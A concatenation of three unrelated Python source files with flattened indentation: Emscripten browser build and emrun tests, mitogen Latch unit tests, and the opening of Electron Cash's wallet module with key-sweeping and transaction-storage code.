self.btest(test_file('emscripten_throw_string.c'), '0', args=['--pre-js', test_file('emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest('minimal_hello.c', '0', args=['-s', 'ENVIRONMENT=web', '-O3', '--closure=1'])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'ENVIRONMENT=web', '-O3', '--closure=1'])
def test_no_declare_asm_module_exports_asmjs(self):
for minimal_runtime in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure=1', '-s', 'WASM=0'] + minimal_runtime)
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure=1', '-s', 'MINIMAL_RUNTIME'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
def test_minimal_runtime_loader_shell(self):
args = ['-s', 'MINIMAL_RUNTIME=2']
for wasm in [[], ['-s', 'WASM=0', '--memory-init-file', '0'], ['-s', 'WASM=0', '--memory-init-file', '1'], ['-s', 'SINGLE_FILE'], ['-s', 'WASM=0', '-s', 'SINGLE_FILE']]:
for modularize in [[], ['-s', 'MODULARIZE']]:
print(str(args + wasm + modularize))
self.btest('minimal_hello.c', '0', args=args + wasm + modularize)
# Tests that -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_world(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_COMPILATION', '--closure=1'], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION', '--closure', '1']]:
self.btest(test_file('small_hello_world.c'), '0', args=args + ['-s', 'MINIMAL_RUNTIME'])
@requires_threads
def test_offset_converter(self, *args):
try:
self.btest_exit(test_file('browser', 'test_offset_converter.c'), assert_returncode=1, args=['-s', 'USE_OFFSET_CONVERTER', '-g4', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
except Exception as e:
# dump the wasm file; this is meant to help debug #10539 on the bots
print(self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), 'test.wasm', '-g', '--print', '-all'], stdout=PIPE).stdout)
raise e
# Tests emscripten_unwind_to_js_event_loop() behavior
def test_emscripten_unwind_to_js_event_loop(self, *args):
self.btest(test_file('browser', 'test_emscripten_unwind_to_js_event_loop.c'), '1', args=['-s', 'NO_EXIT_RUNTIME'])
def test_wasm2js_fallback(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# First run with WebAssembly support enabled
# Move the Wasm2js fallback away to test it is not accidentally getting loaded.
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
os.rename('test.wasm.js.unused', 'test.wasm.js')
# Then disable WebAssembly support in VM, and try again.. Should still work with Wasm2JS fallback.
html = open('test.html', 'r').read()
html = html.replace('<body>', '<body><script>delete WebAssembly;</script>')
open('test.html', 'w').write(html)
os.remove('test.wasm') # Also delete the Wasm file to test that it is not attempted to be loaded.
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_wasm2js_fallback_on_wasm_compilation_failure(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# Run without the .wasm.js file present: with Wasm support, the page should still run
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
# Restore the .wasm.js file, then corrupt the .wasm file, that should trigger the Wasm2js fallback to run
os.rename('test.wasm.js.unused', 'test.wasm.js')
shutil.copyfile('test.js', 'test.wasm')
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_system(self):
self.btest(test_file('system.c'), '0')
# Tests that it is possible to hook into/override a symbol defined in a system library.
@requires_graphics_hardware
def test_override_system_js_lib_symbol(self):
# This test verifies it is possible to override a symbol from WebGL library.
# When WebGL is implicitly linked in, the implicit linking should happen before any user --js-libraries, so that they can adjust
# the behavior afterwards.
self.btest(test_file('test_override_system_js_lib_symbol.c'),
expected='5121',
args=['--js-library', test_file('test_override_system_js_lib_symbol.js')])
# When WebGL is explicitly linked to in strict mode, the linking order on command line should enable overriding.
self.btest(test_file('test_override_system_js_lib_symbol.c'),
expected='5121',
args=['-s', 'AUTO_JS_LIBRARIES=0', '-lwebgl.js', '--js-library', test_file('test_override_system_js_lib_symbol.js')])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4gb(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we can allocate in the 2-4GB range, if we enable growth and
# set the max appropriately
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB']
self.do_run_in_out_file_test('browser', 'test_4GB.cpp', js_engines=[config.V8_ENGINE])
# Tests that emmalloc supports up to 4GB Wasm heaps.
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_4gb(self):
self.btest(test_file('mem_growth.cpp'),
expected='-65536', # == 4*1024*1024*1024 - 65536 casted to signed
args=['-s', 'MALLOC=emmalloc', '-s', 'ABORTING_MALLOC=0', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'MAXIMUM_MEMORY=4GB'])
# Test that it is possible to malloc() a huge 3GB memory block in 4GB mode using emmalloc.
# Also test emmalloc-memvalidate and emmalloc-memvalidate-verbose build configurations.
@no_firefox('no 4GB support yet')
def test_emmalloc_3GB(self):
def test(args):
self.btest(test_file('alloc_3gb.cpp'),
expected='0',
args=['-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ALLOW_MEMORY_GROWTH=1'] + args)
test(['-s', 'MALLOC=emmalloc'])
test(['-s', 'MALLOC=emmalloc-debug'])
test(['-s', 'MALLOC=emmalloc-memvalidate'])
test(['-s', 'MALLOC=emmalloc-memvalidate-verbose'])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_2gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that growth doesn't go beyond 2GB without the max being set for that,
# and that we can catch an allocation failure exception for that
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=2GB']
self.do_run_in_out_file_test('browser', 'test_2GB_fail.cpp', js_engines=[config.V8_ENGINE])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we properly report an allocation error that would overflow over
# 4GB.
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ABORTING_MALLOC=0']
self.do_run_in_out_file_test('browser', 'test_4GB_fail.cpp', js_engines=[config.V8_ENGINE])
@disabled("only run this manually, to test for race conditions")
@parameterized({
'normal': ([],),
'assertions': (['-s', 'ASSERTIONS'],)
})
@requires_threads
def test_manual_pthread_proxy_hammer(self, args):
# the specific symptom of the hang that was fixed is that the test hangs
# at some point, using 0% CPU. often that occured in 0-200 iterations, but
# you may want to adjust "ITERATIONS".
self.btest(test_file('pthread', 'test_pthread_proxy_hammer.cpp'),
expected='0',
args=['-s', 'USE_PTHREADS', '-O2', '-s', 'PROXY_TO_PTHREAD',
'-DITERATIONS=1024', '-g1'] + args,
timeout=10000,
# don't run this with the default extra_tries value, as this is
# *meant* to notice something random, a race condition.
extra_tries=0)
def test_assert_failure(self):
self.btest(test_file('browser', 'test_assert_failure.c'), 'abort:Assertion failed: false && "this is a test"')
EMRUN = path_from_root('emrun')
class emrun(RunnerCore):
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = self.run_process([EMRUN, '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = self.run_process([EMRUN, '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
def test_no_browser(self):
# Test --no_browser mode where we have to take care of launching the browser ourselves
# and then killing emrun when we are done.
if not has_browser():
self.skipTest('need a browser')
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
proc = subprocess.Popen([EMRUN, '--no_browser', '.', '--port=3333'], stdout=PIPE)
try:
if EMTEST_BROWSER:
print('Starting browser')
browser_cmd = shlex.split(EMTEST_BROWSER)
browser = subprocess.Popen(browser_cmd + ['http://localhost:3333/hello_world.html'])
try:
while True:
stdout = proc.stdout.read()
if b'Dumping out file' in stdout:
break
finally:
print('Terminating browser')
browser.terminate()
browser.wait()
finally:
print('Terminating emrun server')
proc.terminate()
proc.wait()
def test_emrun(self):
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
if not has_browser():
self.skipTest('need a browser')
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the
# browser that is launched will have that directory as startup directory, and the browser will
# not close as part of the test, pinning down the cwd on Windows and it wouldn't be possible to
# delete it. Therefore switch away from that directory before launching.
os.chdir(path_from_root())
args_base = [EMRUN, '--timeout', '30', '--safe_firefox_profile',
'--kill_exit', '--port', '6939', '--verbose',
'--log_stdout', self.in_dir('stdout.txt'),
'--log_stderr', self.in_dir('stderr.txt')]
# Verify that trying to pass argument to the page without the `--` separator will
# generate an actionable error message
err = self.expect_fail(args_base + ['--foo'])
self.assertContained('error: unrecognized arguments: --foo', err)
self.assertContained('remember to add `--` between arguments', err)
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser,
# (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and ('-profile' in browser_args or '--profile' in browser_args):
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
parser.add_argument('--profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--private_browsing', '--port', '6941']
]:
args += [self.in_dir('hello_world.html'), '--', '1', '2', '--3']
print(shared.shlex_join(args))
proc = self.run_process(args, check=False)
self.assertEqual(proc.returncode, 100)
stdout = open(self.in_dir('stdout.txt'), 'r').read()
stderr = open(self.in_dir('stderr.txt'), 'r').read()
self.assertContained('argc: 4', stdout)
self.assertContained('argv[3]: --3', stdout)
self.assertContained('hello, world!', stdout)
self.assertContained('Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', stdout)
self.assertContained('Testing char sequences: %20%21 ä', stdout)
self.assertContained('hello, error stream!', stderr)
|
latch_test.py |
import threading
import unittest2
import mitogen.core
import testlib
class EmptyTest(testlib.TestCase):
klass = mitogen.core.Latch
def test_is_empty(self):
latch = self.klass()
self.assertTrue(latch.empty())
def test_is_nonempty(self):
latch = self.klass()
latch.put(None)
self.assertTrue(not latch.empty())
class GetTest(testlib.TestCase):
klass = mitogen.core.Latch
# TODO: test multiple waiters.
def test_empty_noblock(self):
latch = self.klass()
exc = self.assertRaises(mitogen.core.TimeoutError,
lambda: latch.get(block=False))
def test_empty_zero_timeout(self):
latch = self.klass()
exc = self.assertRaises(mitogen.core.TimeoutError,
lambda: latch.get(timeout=0))
def test_nonempty(self):
obj = object()
latch = self.klass()
latch.put(obj)
self.assertEquals(obj, latch.get())
def test_nonempty_noblock(self):
obj = object()
latch = self.klass()
latch.put(obj)
self.assertEquals(obj, latch.get(block=False))
def test_nonempty_zero_timeout(self):
obj = object()
latch = self.klass()
latch.put(obj)
self.assertEquals(obj, latch.get(timeout=0))
class ThreadedGetTest(testlib.TestCase):
klass = mitogen.core.Latch
def setUp(self):
super(ThreadedGetTest, self).setUp()
self.results = []
self.excs = []
self.threads = []
def _worker(self, func):
try:
self.results.append(func())
except Exception, e:
self.results.append(None)
self.excs.append(e)
def start_one(self, func):
thread = threading.Thread(target=self._worker, args=(func,))
thread.start()
self.threads.append(thread)
def join(self):
for th in self.threads:
th.join(3.0)
def test_one_thread(self):
latch = self.klass()
self.start_one(lambda: latch.get(timeout=3.0))
latch.put('test')
self.join()
self.assertEquals(self.results, ['test'])
self.assertEquals(self.excs, [])
def test_five_threads(self):
latch = self.klass()
for x in xrange(5):
self.start_one(lambda: latch.get(timeout=3.0))
for x in xrange(5):
latch.put(x)
self.join()
self.assertEquals(sorted(self.results), range(5))
self.assertEquals(self.excs, [])
class PutTest(testlib.TestCase):
klass = mitogen.core.Latch
def test_put(self):
latch = self.klass()
latch.put(None)
self.assertEquals(None, latch.get())
class CloseTest(testlib.TestCase):
klass = mitogen.core.Latch
def test_empty_noblock(self):
latch = self.klass()
latch.close()
self.assertRaises(mitogen.core.LatchError,
lambda: latch.get(block=False))
def test_empty_zero_timeout(self):
latch = self.klass()
latch.close()
self.assertRaises(mitogen.core.LatchError,
lambda: latch.get(timeout=0))
def test_nonempty(self):
obj = object()
latch = self.klass()
latch.put(obj)
latch.close()
self.assertRaises(mitogen.core.LatchError,
lambda: latch.get())
def test_nonempty_noblock(self):
obj = object()
latch = self.klass()
latch.put(obj)
latch.close()
self.assertRaises(mitogen.core.LatchError,
lambda: latch.get(block=False))
def test_nonempty_zero_timeout(self):
obj = object()
latch = self.klass()
latch.put(obj)
latch.close()
self.assertRaises(mitogen.core.LatchError,
lambda: latch.get(timeout=0))
def test_put(self):
latch = self.klass()
latch.close()
self.assertRaises(mitogen.core.LatchError,
lambda: latch.put(None))
def test_double_close(self):
latch = self.klass()
latch.close()
latch.close()
class ThreadedCloseTest(testlib.TestCase):
klass = mitogen.core.Latch
def setUp(self):
super(ThreadedCloseTest, self).setUp()
self.results = []
self.excs = []
self.threads = []
def _worker(self, func):
try:
self.results.append(func())
except Exception, e:
self.results.append(None)
self.excs.append(e)
def start_one(self, func):
thread = threading.Thread(target=self._worker, args=(func,))
thread.start()
self.threads.append(thread)
def join(self):
for th in self.threads:
th.join(3.0)
def test_one_thread(self):
latch = self.klass()
self.start_one(lambda: latch.get(timeout=3.0))
latch.close()
self.join()
self.assertEquals(self.results, [None])
for exc in self.excs:
self.assertTrue(isinstance(exc, mitogen.core.LatchError))
def test_five_threads(self):
latch = self.klass()
for x in xrange(5):
self.start_one(lambda: latch.get(timeout=3.0))
latch.close()
self.join()
self.assertEquals(self.results, [None]*5)
for exc in self.excs:
self.assertTrue(isinstance(exc, mitogen.core.LatchError))
if __name__ == '__main__':
unittest2.main()
|
wallet.py | # Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Wallet classes:
# - ImportedAddressWallet: imported address, no keystore
# - ImportedPrivkeyWallet: imported private keys, keystore
# - Standard_Wallet: one keystore, P2PKH
# - Multisig_Wallet: several keystores, P2SH
import copy
import errno
import json
import itertools
import os
import queue
import random
import threading
import time
from collections import defaultdict, namedtuple
from enum import Enum, auto
from functools import partial
from typing import Set, Tuple, Union
from .i18n import ngettext
from .util import (NotEnoughFunds, ExcessiveFee, PrintError, UserCancelled, profiler, format_satoshis, format_time,
finalization_print_error, to_string, TimeoutException)
from .address import Address, Script, ScriptOutput, PublicKey, OpCodes
from .bitcoin import *
from .version import *
from .keystore import load_keystore, Hardware_KeyStore, Imported_KeyStore, BIP32_KeyStore, xpubkey_to_address
from . import networks
from . import keystore
from .storage import multisig_type, WalletStorage
from . import transaction
from .transaction import Transaction, InputValueMissing
from .plugins import run_hook
from . import bitcoin
from . import coinchooser
from .synchronizer import Synchronizer
from .verifier import SPV, SPVDelegate
from . import schnorr
from . import ecc_fast
from .blockchain import NULL_HASH_HEX
from . import paymentrequest
from .paymentrequest import InvoiceStore, PR_PAID, PR_UNCONFIRMED, PR_UNPAID, PR_UNKNOWN, PR_EXPIRED
from .contacts import Contacts
from . import cashacct
from . import slp
def _(message): return message
TX_STATUS = [
_('Unconfirmed parent'),
_('Low fee'),
_('Unconfirmed'),
_('Not Verified'),
]
del _
from .i18n import _
DEFAULT_CONFIRMED_ONLY = False
def relayfee(network):
RELAY_FEE = 5000
MAX_RELAY_FEE = 50000
f = network.relay_fee if network and network.relay_fee else RELAY_FEE
return min(f, MAX_RELAY_FEE)
def dust_threshold(network):
# Change < dust threshold is added to the tx fee
#return 182 * 3 * relayfee(network) / 1000 # original Electrum logic
#return 1 # <-- was this value until late Sept. 2018
return 546 # hard-coded Bitcoin Cash dust threshold. Was changed to this as of Sept. 2018
def sweep_preparations(privkeys, network, imax=100):
class InputsMaxxed(Exception):
pass
def append_utxos_to_inputs(inputs, pubkey, txin_type):
if txin_type == 'p2pkh':
address = Address.from_pubkey(pubkey)
else:
address = PublicKey.from_pubkey(pubkey)
sh = address.to_scripthash_hex()
u = network.synchronous_get(('blockchain.scripthash.listunspent', [sh]))
for item in u:
if len(inputs) >= imax:
raise InputsMaxxed()
item['address'] = address
item['type'] = txin_type
item['prevout_hash'] = item['tx_hash']
item['prevout_n'] = item['tx_pos']
item['pubkeys'] = [pubkey]
item['x_pubkeys'] = [pubkey]
item['signatures'] = [None]
item['num_sig'] = 1
inputs.append(item)
def find_utxos_for_privkey(txin_type, privkey, compressed):
pubkey = bitcoin.public_key_from_private_key(privkey, compressed)
append_utxos_to_inputs(inputs, pubkey, txin_type)
keypairs[pubkey] = privkey, compressed
inputs = []
keypairs = {}
try:
for sec in privkeys:
txin_type, privkey, compressed = bitcoin.deserialize_privkey(sec)
find_utxos_for_privkey(txin_type, privkey, compressed)
# do other lookups to increase support coverage
if is_minikey(sec):
# minikeys don't have a compressed byte
# we lookup both compressed and uncompressed pubkeys
find_utxos_for_privkey(txin_type, privkey, not compressed)
elif txin_type == 'p2pkh':
# WIF serialization does not distinguish p2pkh and p2pk
# we also search for pay-to-pubkey outputs
find_utxos_for_privkey('p2pk', privkey, compressed)
elif txin_type == 'p2sh':
raise ValueError(_("The specified WIF key '{}' is a p2sh WIF key. These key types cannot be swept.").format(sec))
except InputsMaxxed:
pass
if not inputs:
raise ValueError(_('No inputs found. (Note that inputs need to be confirmed)'))
return inputs, keypairs
def sweep(privkeys, network, config, recipient, fee=None, imax=100, sign_schnorr=False):
inputs, keypairs = sweep_preparations(privkeys, network, imax)
total = sum(i.get('value') for i in inputs)
if fee is None:
outputs = [(TYPE_ADDRESS, recipient, total)]
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = config.estimate_fee(tx.estimated_size())
if total - fee < 0:
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d'%(total, fee))
if total - fee < dust_threshold(network):
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d\nDust Threshold: %d'%(total, fee, dust_threshold(network)))
outputs = [(TYPE_ADDRESS, recipient, total - fee)]
locktime = network.get_local_height()
tx = Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
tx.BIP_LI01_sort()
tx.sign(keypairs)
return tx
class Abstract_Wallet(PrintError, SPVDelegate):
"""
Wallet classes are created to handle various address generation methods.
Completion states (watching-only, single account, no seed, etc) are handled inside classes.
"""
max_change_outputs = 3
def __init__(self, storage):
self.electrum_version = PACKAGE_VERSION
self.storage = storage
self.thread = None # this is used by the qt main_window to store a QThread. We just make sure it's always defined as an attribute here.
self.network = None
# verifier (SPV) and synchronizer are started in start_threads
self.synchronizer = None
self.verifier = None
self.weak_window = None # Some of the GUI classes, such as the Qt ElectrumWindow, use this to refer back to themselves. This should always be a weakref.ref (Weak.ref), or None
# CashAccounts subsystem. Its network-dependent layer is started in
# start_threads. Note: object instantiation should be lightweight here.
# self.cashacct.load() is called later in this function to load data.
self.cashacct = cashacct.CashAcct(self)
self.slp = slp.WalletData(self)
finalization_print_error(self.cashacct) # debug object lifecycle
finalization_print_error(self.slp) # debug object lifecycle
# Removes defunct entries from self.pruned_txo asynchronously
self.pruned_txo_cleaner_thread = None
# Cache of Address -> (c,u,x) balance. This cache is used by
# get_addr_balance to significantly speed it up (it is called a lot).
# Cache entries are invalidated when tx's are seen involving this
# address (address history chages). Entries to this cache are added
# only inside get_addr_balance.
# Note that this data structure is touched by the network and GUI
# thread concurrently without the use of locks, because Python GIL
# allows us to get away with such things. As such do not iterate over
# this dict, but simply add/remove items to/from it in 1-liners (which
# Python's GIL makes thread-safe implicitly).
self._addr_bal_cache = {}
# We keep a set of the wallet and receiving addresses so that is_mine()
# checks are O(logN) rather than O(N). This creates/resets that cache.
self.invalidate_address_set_cache()
self.gap_limit_for_change = 20 # constant
# saved fields
self.use_change = storage.get('use_change', True)
self.multiple_change = storage.get('multiple_change', False)
self.labels = storage.get('labels', {})
# Frozen addresses
frozen_addresses = storage.get('frozen_addresses',[])
self.frozen_addresses = set(Address.from_string(addr)
for addr in frozen_addresses)
# Frozen coins (UTXOs) -- note that we have 2 independent levels of "freezing": address-level and coin-level.
# The two types of freezing are flagged independently of each other and 'spendable' is defined as a coin that satisfies
# BOTH levels of freezing.
self.frozen_coins = set(storage.get('frozen_coins', []))
self.frozen_coins_tmp = set() # in-memory only
self.change_reserved = set(Address.from_string(a) for a in storage.get('change_reserved', ()))
self.change_reserved_default = [Address.from_string(a) for a in storage.get('change_reserved_default', ())]
self.change_unreserved = [Address.from_string(a) for a in storage.get('change_unreserved', ())]
self.change_reserved_tmp = set() # in-memory only
# address -> list(txid, height)
history = storage.get('addr_history',{})
self._history = self.to_Address_dict(history)
# there is a difference between wallet.up_to_date and interface.is_up_to_date()
# interface.is_up_to_date() returns true when all requests have been answered and processed
# wallet.up_to_date is true when the wallet is synchronized (stronger requirement)
self.up_to_date = False
# The only lock. We used to have two here. That was more technical debt
# without much purpose. 1 lock is sufficient. In particular data
# structures that are touched by the network thread as well as the GUI
# (such as self.transactions, history, etc) need to be synchronized
# using this mutex.
self.lock = threading.RLock()
# load requests
requests = self.storage.get('payment_requests', {})
for key, req in requests.items():
req['address'] = Address.from_string(key)
self.receive_requests = {req['address']: req
for req in requests.values()}
# Transactions pending verification. A map from tx hash to transaction
# height. Access is contended so a lock is needed. Client code should
# use get_unverified_tx to get a thread-safe copy of this dict.
self.unverified_tx = defaultdict(int)
# Verified transactions. Each value is a (height, timestamp, block_pos) tuple. Access with self.lock.
self.verified_tx = storage.get('verified_tx3', {})
# save wallet type the first time
if self.storage.get('wallet_type') is None:
self.storage.put('wallet_type', self.wallet_type)
# invoices and contacts
self.invoices = InvoiceStore(self.storage)
self.contacts = Contacts(self.storage)
# cashacct is started in start_threads, but it needs to have relevant
# data here, before the below calls happen
self.cashacct.load()
self.slp.load() # try to load first so we can pick up the remove_transaction hook from load_transactions if need be
# Now, finally, after object is constructed -- we can do this
self.load_keystore_wrapper()
self.load_addresses()
self.load_transactions()
self.build_reverse_history()
self.check_history()
if self.slp.need_rebuild:
# load failed, must rebuild from self.transactions
self.slp.rebuild()
self.slp.save() # commit changes to self.storage
# Print debug message on finalization
finalization_print_error(self, "[{}/{}] finalized".format(type(self).__name__, self.diagnostic_name()))
@classmethod
def to_Address_dict(cls, d):
'''Convert a dict of strings to a dict of Adddress objects.'''
return {Address.from_string(text): value for text, value in d.items()}
@classmethod
def from_Address_dict(cls, d):
'''Convert a dict of Address objects to a dict of strings.'''
return {addr.to_storage_string(): value
for addr, value in d.items()}
def diagnostic_name(self):
return self.basename()
def __str__(self):
return self.basename()
def get_master_public_key(self):
return None
def load_keystore_wrapper(self):
""" Loads the keystore, but also tries to preserve derivation(s). Older
Electron Cash versions would not save the derivation for all keystore
types. So this function ensures:
1. That on first run, we store the keystore_derivations to top-level
storage (which is preserved always).
2. On subsequent runs we try and load the keystore_derivations from
storage and restore them if the individual keystore.derivation data
items were lost (because user loaded wallet with older Electron
Cash).
This function is provided to allow users to switch between old and new
EC versions. In the future if we deprecate the wallet format, or if
enough time has passed, this function may be removed and the simple
self.load_keystore() may be used instead. """
self.load_keystore()
if not hasattr(self, 'get_keystores'):
return
from .keystore import Deterministic_KeyStore, Old_KeyStore
keystores = self.get_keystores()
keystore_derivations = self.storage.get('keystore_derivations', [])
if len(keystore_derivations) != len(keystores):
keystore_derivations = [None] * len(keystores)
updated, updated_ks, updated_st = False, False, False
for i, keystore in enumerate(keystores):
if i == 0 and isinstance(keystore, Deterministic_KeyStore) and not keystore.seed_type:
# Attempt to update keystore.seed_type
if isinstance(keystore, Old_KeyStore):
keystore.seed_type = 'old'
updated_st = True
else:
# attempt to restore the seed_type based on wallet saved "seed_type"
typ = self.storage.get('seed_type')
if typ in ('standard', 'electrum'):
keystore.seed_type = 'electrum'
updated_st = True
elif typ == 'bip39':
keystore.seed_type = 'bip39'
updated_st = True
saved_der = keystore_derivations[i]
der = (keystore.has_derivation() and keystore.derivation) or None
if der != saved_der:
if der:
# keystore had a derivation, but top-level storage did not
# (this branch is typically taken on first run after
# restoring from seed or creating a new wallet)
keystore_derivations[i] = saved_der = der
updated = True
elif saved_der:
# we had a derivation but keystore did not. This branch is
# taken if the user has loaded this wallet with an older
# version of Electron Cash. Attempt to restore their
# derivation item in keystore.
keystore.derivation = der # write to keystore
updated_ks = True # tell it to re-save
if updated:
self.print_error("Updated keystore_derivations")
self.storage.put('keystore_derivations', keystore_derivations)
if updated_ks or updated_st:
if updated_ks:
self.print_error("Updated keystore (lost derivations restored)")
if updated_st:
self.print_error("Updated keystore (lost seed_type restored)")
self.save_keystore()
if any((updated, updated_ks, updated_st)):
self.storage.write()
@profiler
def load_transactions(self):
txi = self.storage.get('txi', {})
self.txi = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txi.items()
# skip empty entries to save memory and disk space
if value}
txo = self.storage.get('txo', {})
self.txo = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txo.items()
# skip empty entries to save memory and disk space
if value}
self.tx_fees = self.storage.get('tx_fees', {})
self.pruned_txo = self.storage.get('pruned_txo', {})
self.pruned_txo_values = set(self.pruned_txo.values())
tx_list = self.storage.get('transactions', {})
self.transactions = {}
for tx_hash, raw in tx_list.items():
tx = Transaction(raw)
self.transactions[tx_hash] = tx
if not self.txi.get(tx_hash) and not self.txo.get(tx_hash) and (tx_hash not in self.pruned_txo_values):
self.print_error("removing unreferenced tx", tx_hash)
self.transactions.pop(tx_hash)
self.cashacct.remove_transaction_hook(tx_hash)
self.slp.rm_tx(tx_hash)
@profiler
def save_transactions(self, write=False):
with self.lock:
tx = {}
for k,v in self.transactions.items():
tx[k] = str(v)
self.storage.put('transactions', tx)
txi = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txi.items()
# skip empty entries to save memory and disk space
if value}
txo = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txo.items()
# skip empty entries to save memory and disk space
if value}
self.storage.put('txi', txi)
self.storage.put('txo', txo)
self.storage.put('tx_fees', self.tx_fees)
self.storage.put('pruned_txo', self.pruned_txo)
history = self.from_Address_dict(self._history)
self.storage.put('addr_history', history)
self.slp.save()
if write:
self.storage.write()
def save_verified_tx(self, write=False):
with self.lock:
self.storage.put('verified_tx3', self.verified_tx)
self.cashacct.save()
if write:
self.storage.write()
def save_change_reservations(self):
with self.lock:
self.storage.put('change_reserved_default', [a.to_storage_string() for a in self.change_reserved_default])
self.storage.put('change_reserved', [a.to_storage_string() for a in self.change_reserved])
unreserved = self.change_unreserved + list(self.change_reserved_tmp)
self.storage.put('change_unreserved', [a.to_storage_string() for a in unreserved])
def clear_history(self):
with self.lock:
self.txi = {}
self.txo = {}
self.tx_fees = {}
self.pruned_txo = {}
self.pruned_txo_values = set()
self.slp.clear()
self.save_transactions()
self._addr_bal_cache = {}
self._history = {}
self.tx_addr_hist = defaultdict(set)
self.cashacct.on_clear_history()
@profiler
def build_reverse_history(self):
self.tx_addr_hist = defaultdict(set)
for addr, hist in self._history.items():
